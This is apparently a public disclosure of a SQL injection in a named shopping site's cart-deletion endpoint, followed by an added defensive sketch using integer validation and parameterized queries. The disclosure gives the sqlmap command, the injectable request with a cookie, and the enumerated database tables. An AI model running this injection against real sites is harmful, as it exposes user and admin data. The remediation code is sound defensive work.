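2016-05-03: Details reported to the vendor; awaiting vendor handling.
2016-05-09: The vendor actively ignored the vulnerability; details disclosed to the public.

As the title says: this vendor has never given a rating above 10 points, so let me be the first to break that.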
POST injection: sqlmap.py -r 1.txt --dbs

Request packet (injection parameter: id):

```
POST /delete_cart_goods.php HTTP/1.1
Host: shop.gmw.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS_ID=df6861b8e51456e4b62eb77981c2acc21162ba5c; ECS[visit_times]=1
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

id=1
```
Databases

```
back-end DBMS: MySQL 5.0
available databases [2]:
[*] ecshop
[*] information_schema
```
Table information

```
Database: ecshop
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| ecs_stats          | 4829513 |
| ecs_users          | 60469   |
| ecs_goods_attr     | 45934   |
| ecs_keywords       | 9852    |
| ecs_goods_gallery  | 6632    |
| ecs_goods          | 6407    |
| ecs_admin_log      | 5005    |
| ecs_ddbook         | 3983    |
| ecs_region         | 3408    |
| ecs_searchengine   | 1638    |
| ecs_order_goods    | 1192    |
| ecs_jdhongwenge    | 819     |
| ecs_sessions_data  | 660     |
| ecs_order_action   | 565     |
| ecs_sessions       | 468     |
| ecs_pay_log        | 377     |
| ecs_order_info     | 336     |
| ecs_article        | 218     |
| ecs_attribute      | 210     |
| ecs_user_address   | 201     |
| ecs_shop_config    | 177     |
| ecs_delivery_goods | 175     |
| ecs_goods_article  | 147     |
| ecs_admin_action   | 109     |
| ecs_goods_cat      | 92      |
| ecs_adsense        | 57      |
| ecs_category       | 56      |
| ecs_delivery_order | 56      |
| ecs_account_log    | 46      |
| ecs_collect_goods  | 40      |
| ecs_template       | 38      |
| ecs_ad_position    | 33      |
| ecs_ad             | 32      |
| ecs_cid_book       | 21      |
| ecs_nav            | 21      |
| ecs_email_sendlist | 20      |
| ecs_cat_recommend  | 17      |
| ecs_article_cat    | 14      |
| ecs_mail_templates | 14      |
| ecs_goods_type     | 13      |
| ecs_email_list     | 11      |
| ecs_exchange_goods | 11      |
| ecs_suppliers      | 9       |
| ecs_feedback       | 7       |
| ecs_friend_link    | 7       |
| ecs_reg_fields     | 6       |
| ecs_volume_price   | 6       |
| ecs_content_key    | 5       |
| ecs_payment        | 5       |
| ecs_bonus_type     | 4       |
| ecs_comment        | 3       |
| ecs_user_rank      | 3       |
| ecs_vote_option    | 3       |
| ecs_admin_user     | 2       |
| ecs_area_region    | 2       |
| ecs_shipping       | 2       |
| ecs_shipping_area  | 2       |
| ecs_user_account   | 2       |
| ecs_role           | 1       |
| ecs_vote           | 1       |
+--------------------+---------+
```
I won't dump the data.
Hehe.
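
A defensive sketch for the `id` parameter in the request above, added here as an example and not the vendor's or ECShop's own code: the POST body is parsed, `id` is accepted only as a positive integer, and the delete runs as a parameterized statement scoped to the caller's session. The `cart` table, its columns, the function names and the sample bodies are hypothetical, and SQLite stands in for MySQL so the block runs offline.

```python
import sqlite3
from urllib.parse import parse_qs


def make_db():
    # Constructed stand-in for the shop database; table and columns are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cart (rec_id INTEGER PRIMARY KEY, session_id TEXT, goods TEXT)")
    db.executemany("INSERT INTO cart VALUES (?, ?, ?)",
                   [(1, "sess-a", "book"), (2, "sess-a", "pen"), (3, "sess-b", "map")])
    return db


def parse_cart_id(body):
    """Return `id` from a form-encoded POST body, accepting only 1..9999999999."""
    values = parse_qs(body, keep_blank_values=True).get("id", [])
    if len(values) != 1:
        raise ValueError("exactly one id parameter is required")
    raw = values[0]
    # ASCII digits only: rejects signs, spaces, quotes, SQL keywords, Unicode digits.
    if not (raw.isascii() and raw.isdigit()) or len(raw) > 10 or int(raw) < 1:
        raise ValueError("id must be a positive integer")
    return int(raw)


def delete_cart_goods(db, session_id, body):
    """Delete one cart row owned by this session; return the number of rows removed."""
    rec_id = parse_cart_id(body)
    # Values are bound as parameters, so they never become part of the SQL text.
    cur = db.execute("DELETE FROM cart WHERE rec_id = ? AND session_id = ?",
                     (rec_id, session_id))
    db.commit()
    return cur.rowcount


def cart_size(db):
    return db.execute("SELECT COUNT(*) FROM cart").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("valid id=1 ->", delete_cart_goods(db, "sess-a", "id=1"), "row deleted")
    # Constructed malformed bodies; each must be rejected before any SQL runs.
    for bad in ("id=1+OR+1%3D1", "id=1%27", "id=", "id=-1", "id=1&id=2"):
        try:
            delete_cart_goods(db, "sess-a", bad)
        except ValueError as exc:
            print(repr(bad), "rejected:", exc)
    print("rows left:", cart_size(db))
```

Validation and binding are independent layers: even if the integer check were loosened, the bound parameter would still be treated as data rather than SQL.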
Severity: No impact (ignored by vendor)
Ignored at: 2016-05-09 09:00
Vulnerability Rank: 4 (WooYun rating)
None yet